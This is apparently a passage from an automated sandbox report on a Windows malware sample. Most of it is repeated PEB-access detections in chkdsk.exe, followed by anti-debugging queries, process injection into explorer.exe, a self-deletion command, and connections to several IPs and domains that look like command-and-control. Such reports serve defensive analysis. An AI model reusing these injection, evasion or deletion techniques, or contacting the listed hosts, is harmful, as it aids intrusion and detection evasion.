Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DBFD9B mov eax, dword ptr fs:[00000030h] 10_2_04DBFD9B (2 occurrences)
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E505AC mov eax, dword ptr fs:[00000030h] 10_2_04E505AC (2 occurrences)
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D82D8A mov eax, dword ptr fs:[00000030h] 10_2_04D82D8A (5 occurrences)
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB2581 mov eax, dword ptr fs:[00000030h] 10_2_04DB2581 (4 occurrences)
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB1DB5 mov eax, dword ptr fs:[00000030h] 10_2_04DB1DB5 (3 occurrences)
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB35A1 mov eax, dword ptr fs:[00000030h] 10_2_04DB35A1
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DA7D50 mov eax, dword ptr fs:[00000030h] 10_2_04DA7D50
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC3D43 mov eax, dword ptr fs:[00000030h] 10_2_04DC3D43
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E03540 mov eax, dword ptr fs:[00000030h] 10_2_04E03540
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DAC577 mov eax, dword ptr fs:[00000030h] 10_2_04DAC577 (2 occurrences)
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E58D34 mov eax, dword ptr fs:[00000030h] 10_2_04E58D34
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E0A537 mov eax, dword ptr fs:[00000030h] 10_2_04E0A537
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E4E539 mov eax, dword ptr fs:[00000030h] 10_2_04E4E539
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB4D3B mov eax, dword ptr fs:[00000030h] 10_2_04DB4D3B (3 occurrences)
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D8AD30 mov eax, dword ptr fs:[00000030h] 10_2_04D8AD30
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D93D34 mov eax, dword ptr fs:[00000030h] 10_2_04D93D34 (13 occurrences)
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB36CC mov eax, dword ptr fs:[00000030h] 10_2_04DB36CC
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC8EC7 mov eax, dword ptr fs:[00000030h] 10_2_04DC8EC7
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E3FEC0 mov eax, dword ptr fs:[00000030h] 10_2_04E3FEC0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E58ED6 mov eax, dword ptr fs:[00000030h] 10_2_04E58ED6
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB16E0 mov ecx, dword ptr fs:[00000030h] 10_2_04DB16E0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D976E2 mov eax, dword ptr fs:[00000030h] 10_2_04D976E2
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E50EA5 mov eax, dword ptr fs:[00000030h] 10_2_04E50EA5 (3 occurrences)
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E046A7 mov eax, dword ptr fs:[00000030h] 10_2_04E046A7
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E1FE87 mov eax, dword ptr fs:[00000030h] 10_2_04E1FE87
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D97E41 mov eax, dword ptr fs:[00000030h] 10_2_04D97E41 (6 occurrences)
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E4AE44 mov eax, dword ptr fs:[00000030h] 10_2_04E4AE44 (2 occurrences)
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DAAE73 mov eax, dword ptr fs:[00000030h] 10_2_04DAAE73 (5 occurrences)
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D9766D mov eax, dword ptr fs:[00000030h] 10_2_04D9766D
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DBA61C mov eax, dword ptr fs:[00000030h] 10_2_04DBA61C (2 occurrences)
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D8C600 mov eax, dword ptr fs:[00000030h] 10_2_04D8C600 (3 occurrences)
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB8E00 mov eax, dword ptr fs:[00000030h] 10_2_04DB8E00
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E3FE3F mov eax, dword ptr fs:[00000030h] 10_2_04E3FE3F
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E41608 mov eax, dword ptr fs:[00000030h] 10_2_04E41608
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D8E620 mov eax, dword ptr fs:[00000030h] 10_2_04D8E620
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC37F5 mov eax, dword ptr fs:[00000030h] 10_2_04DC37F5
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D98794 mov eax, dword ptr fs:[00000030h] 10_2_04D98794
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E07794 mov eax, dword ptr fs:[00000030h] 10_2_04E07794 (3 occurrences)
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E58F6A mov eax, dword ptr fs:[00000030h] 10_2_04E58F6A
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D9EF40 mov eax, dword ptr fs:[00000030h] 10_2_04D9EF40
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D9FF60 mov eax, dword ptr fs:[00000030h] 10_2_04D9FF60
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DAF716 mov eax, dword ptr fs:[00000030h] 10_2_04DAF716
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DBA70E mov eax, dword ptr fs:[00000030h] 10_2_04DBA70E (2 occurrences)
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E5070D mov eax, dword ptr fs:[00000030h] 10_2_04E5070D (2 occurrences)
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DBE730 mov eax, dword ptr fs:[00000030h] 10_2_04DBE730
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E1FF10 mov eax, dword ptr fs:[00000030h] 10_2_04E1FF10 (2 occurrences)
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D84F2E mov eax, dword ptr fs:[00000030h] 10_2_04D84F2E (2 occurrences)
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E1B8D0 mov eax, dword ptr fs:[00000030h] 10_2_04E1B8D0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E1B8D0 mov ecx, dword ptr fs:[00000030h] 10_2_04E1B8D0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E1B8D0 mov eax, dword ptr fs:[00000030h] 10_2_04E1B8D0 (4 occurrences)
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D858EC mov eax, dword ptr fs:[00000030h] 10_2_04D858EC
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D89080 mov eax, dword ptr fs:[00000030h] 10_2_04D89080
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DBF0BF mov ecx, dword ptr fs:[00000030h] 10_2_04DBF0BF
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DBF0BF mov eax, dword ptr fs:[00000030h] 10_2_04DBF0BF (2 occurrences)
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E03884 mov eax, dword ptr fs:[00000030h] 10_2_04E03884 (2 occurrences)
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC90AF mov eax, dword ptr fs:[00000030h] 10_2_04DC90AF
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB20A0 mov eax, dword ptr fs:[00000030h] 10_2_04DB20A0 (6 occurrences)
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DA0050 mov eax, dword ptr fs:[00000030h] 10_2_04DA0050 (2 occurrences)
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E51074 mov eax, dword ptr fs:[00000030h] 10_2_04E51074
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E42073 mov eax, dword ptr fs:[00000030h] 10_2_04E42073
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E54015 mov eax, dword ptr fs:[00000030h] 10_2_04E54015 (2 occurrences)
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D9B02A mov eax, dword ptr fs:[00000030h] 10_2_04D9B02A (4 occurrences)
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E07016 mov eax, dword ptr fs:[00000030h] 10_2_04E07016 (3 occurrences)
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB002D mov eax, dword ptr fs:[00000030h] 10_2_04DB002D
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB002D mov eax, dword ptr fs:[00000030h] 10_2_04DB002D
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB002D mov eax, dword ptr fs:[00000030h] 10_2_04DB002D
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB002D mov eax, dword ptr fs:[00000030h] 10_2_04DB002D
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB002D mov eax, dword ptr fs:[00000030h] 10_2_04DB002D
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E141E8 mov eax, dword ptr fs:[00000030h] 10_2_04E141E8
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D8B1E1 mov eax, dword ptr fs:[00000030h] 10_2_04D8B1E1
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D8B1E1 mov eax, dword ptr fs:[00000030h] 10_2_04D8B1E1
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D8B1E1 mov eax, dword ptr fs:[00000030h] 10_2_04D8B1E1
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E069A6 mov eax, dword ptr fs:[00000030h] 10_2_04E069A6
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB2990 mov eax, dword ptr fs:[00000030h] 10_2_04DB2990
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DAC182 mov eax, dword ptr fs:[00000030h] 10_2_04DAC182
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DBA185 mov eax, dword ptr fs:[00000030h] 10_2_04DBA185
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E051BE mov eax, dword ptr fs:[00000030h] 10_2_04E051BE
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E051BE mov eax, dword ptr fs:[00000030h] 10_2_04E051BE
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E051BE mov eax, dword ptr fs:[00000030h] 10_2_04E051BE
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E051BE mov eax, dword ptr fs:[00000030h] 10_2_04E051BE
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB61A0 mov eax, dword ptr fs:[00000030h] 10_2_04DB61A0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB61A0 mov eax, dword ptr fs:[00000030h] 10_2_04DB61A0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DAB944 mov eax, dword ptr fs:[00000030h] 10_2_04DAB944
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DAB944 mov eax, dword ptr fs:[00000030h] 10_2_04DAB944
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D8B171 mov eax, dword ptr fs:[00000030h] 10_2_04D8B171
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D8B171 mov eax, dword ptr fs:[00000030h] 10_2_04D8B171
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D8C962 mov eax, dword ptr fs:[00000030h] 10_2_04D8C962
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D89100 mov eax, dword ptr fs:[00000030h] 10_2_04D89100
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D89100 mov eax, dword ptr fs:[00000030h] 10_2_04D89100
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D89100 mov eax, dword ptr fs:[00000030h] 10_2_04D89100
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB513A mov eax, dword ptr fs:[00000030h] 10_2_04DB513A
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB513A mov eax, dword ptr fs:[00000030h] 10_2_04DB513A
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DA4120 mov eax, dword ptr fs:[00000030h] 10_2_04DA4120
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DA4120 mov eax, dword ptr fs:[00000030h] 10_2_04DA4120
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DA4120 mov eax, dword ptr fs:[00000030h] 10_2_04DA4120
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DA4120 mov eax, dword ptr fs:[00000030h] 10_2_04DA4120
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DA4120 mov ecx, dword ptr fs:[00000030h] 10_2_04DA4120
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB2ACB mov eax, dword ptr fs:[00000030h] 10_2_04DB2ACB
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB2AE4 mov eax, dword ptr fs:[00000030h] 10_2_04DB2AE4
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DBD294 mov eax, dword ptr fs:[00000030h] 10_2_04DBD294
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DBD294 mov eax, dword ptr fs:[00000030h] 10_2_04DBD294
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D9AAB0 mov eax, dword ptr fs:[00000030h] 10_2_04D9AAB0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D9AAB0 mov eax, dword ptr fs:[00000030h] 10_2_04D9AAB0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DBFAB0 mov eax, dword ptr fs:[00000030h] 10_2_04DBFAB0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D852A5 mov eax, dword ptr fs:[00000030h] 10_2_04D852A5
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D852A5 mov eax, dword ptr fs:[00000030h] 10_2_04D852A5
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D852A5 mov eax, dword ptr fs:[00000030h] 10_2_04D852A5
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D852A5 mov eax, dword ptr fs:[00000030h] 10_2_04D852A5
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D852A5 mov eax, dword ptr fs:[00000030h] 10_2_04D852A5
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E3B260 mov eax, dword ptr fs:[00000030h] 10_2_04E3B260
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E3B260 mov eax, dword ptr fs:[00000030h] 10_2_04E3B260
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E58A62 mov eax, dword ptr fs:[00000030h] 10_2_04E58A62
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D89240 mov eax, dword ptr fs:[00000030h] 10_2_04D89240
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D89240 mov eax, dword ptr fs:[00000030h] 10_2_04D89240
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D89240 mov eax, dword ptr fs:[00000030h] 10_2_04D89240
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D89240 mov eax, dword ptr fs:[00000030h] 10_2_04D89240
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC927A mov eax, dword ptr fs:[00000030h] 10_2_04DC927A
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E4EA55 mov eax, dword ptr fs:[00000030h] 10_2_04E4EA55
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E14257 mov eax, dword ptr fs:[00000030h] 10_2_04E14257
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DA3A1C mov eax, dword ptr fs:[00000030h] 10_2_04DA3A1C
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D85210 mov eax, dword ptr fs:[00000030h] 10_2_04D85210
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D85210 mov ecx, dword ptr fs:[00000030h] 10_2_04D85210
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D85210 mov eax, dword ptr fs:[00000030h] 10_2_04D85210
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D85210 mov eax, dword ptr fs:[00000030h] 10_2_04D85210
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D8AA16 mov eax, dword ptr fs:[00000030h] 10_2_04D8AA16
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D8AA16 mov eax, dword ptr fs:[00000030h] 10_2_04D8AA16
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D98A0A mov eax, dword ptr fs:[00000030h] 10_2_04D98A0A
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC4A2C mov eax, dword ptr fs:[00000030h] 10_2_04DC4A2C
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC4A2C mov eax, dword ptr fs:[00000030h] 10_2_04DC4A2C
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E4AA16 mov eax, dword ptr fs:[00000030h] 10_2_04E4AA16
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E4AA16 mov eax, dword ptr fs:[00000030h] 10_2_04E4AA16
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E053CA mov eax, dword ptr fs:[00000030h] 10_2_04E053CA
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E053CA mov eax, dword ptr fs:[00000030h] 10_2_04E053CA
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DADBE9 mov eax, dword ptr fs:[00000030h] 10_2_04DADBE9
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB03E2 mov eax, dword ptr fs:[00000030h] 10_2_04DB03E2
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB03E2 mov eax, dword ptr fs:[00000030h] 10_2_04DB03E2
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB03E2 mov eax, dword ptr fs:[00000030h] 10_2_04DB03E2
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB03E2 mov eax, dword ptr fs:[00000030h] 10_2_04DB03E2
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB03E2 mov eax, dword ptr fs:[00000030h] 10_2_04DB03E2
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB03E2 mov eax, dword ptr fs:[00000030h] 10_2_04DB03E2
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E55BA5 mov eax, dword ptr fs:[00000030h] 10_2_04E55BA5
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DBB390 mov eax, dword ptr fs:[00000030h] 10_2_04DBB390
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB2397 mov eax, dword ptr fs:[00000030h] 10_2_04DB2397
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D91B8F mov eax, dword ptr fs:[00000030h] 10_2_04D91B8F
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D91B8F mov eax, dword ptr fs:[00000030h] 10_2_04D91B8F
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E3D380 mov ecx, dword ptr fs:[00000030h] 10_2_04E3D380
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E4138A mov eax, dword ptr fs:[00000030h] 10_2_04E4138A
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB4BAD mov eax, dword ptr fs:[00000030h] 10_2_04DB4BAD
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB4BAD mov eax, dword ptr fs:[00000030h] 10_2_04DB4BAD
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB4BAD mov eax, dword ptr fs:[00000030h] 10_2_04DB4BAD
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D8F358 mov eax, dword ptr fs:[00000030h] 10_2_04D8F358
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D8DB40 mov eax, dword ptr fs:[00000030h] 10_2_04D8DB40
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB3B7A mov eax, dword ptr fs:[00000030h] 10_2_04DB3B7A
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DB3B7A mov eax, dword ptr fs:[00000030h] 10_2_04DB3B7A
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04D8DB60 mov ecx, dword ptr fs:[00000030h] 10_2_04D8DB60
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E58B58 mov eax, dword ptr fs:[00000030h] 10_2_04E58B58
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04E4131B mov eax, dword ptr fs:[00000030h] 10_2_04E4131B
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\chkdsk.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Code function: 3_2_00409B40 LdrLoadDll, 3_2_00409B40
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe Network Connect: 166.88.62.202 80
Source: C:\Windows\explorer.exe Domain query: www.casatowerofficial.com
Source: C:\Windows\explorer.exe Domain query: www.bitconga.com
Source: C:\Windows\explorer.exe Domain query: www.totalwinerewards.com
Source: C:\Windows\explorer.exe Network Connect: 199.59.243.200 80
Source: C:\Windows\explorer.exe Domain query: www.tothelaundry.com
Source: C:\Windows\explorer.exe Domain query: www.omnipets.store
Source: C:\Windows\explorer.exe Network Connect: 46.252.151.235 80
Source: C:\Windows\explorer.exe Network Connect: 18.231.72.25 80
Source: C:\Windows\explorer.exe Domain query: www.webarate.com
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe Domain query: www.experiencedlawfirms.com
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Section unmapped: C:\Windows\SysWOW64\chkdsk.exe base address: 90000
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Section loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Section loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\chkdsk.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\chkdsk.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Memory written: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Thread register set: target process: 3352
Source: C:\Windows\SysWOW64\chkdsk.exe Thread register set: target process: 3352
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Process created: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe
Source: C:\Windows\SysWOW64\chkdsk.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe"
Source: explorer.exe, 00000005.00000000.381888349.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.363941533.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.348780458.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.443876033.0000000000B68000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Progman\Pr
Source: explorer.exe, 00000005.00000000.364384709.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.349323841.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.444216866.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.382222275.00000000011E0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000005.00000000.386172183.0000000005E10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.364384709.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.349323841.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.444216866.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.382222275.00000000011E0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000005.00000000.364384709.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.349323841.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.444216866.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.382222275.00000000011E0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000005.00000000.364384709.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.349323841.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.444216866.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.382222275.00000000011E0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000005.00000000.374858871.0000000008778000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.390116935.0000000008778000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.356172587.0000000008778000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWndh

Language, Device and Operating System Detection

Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
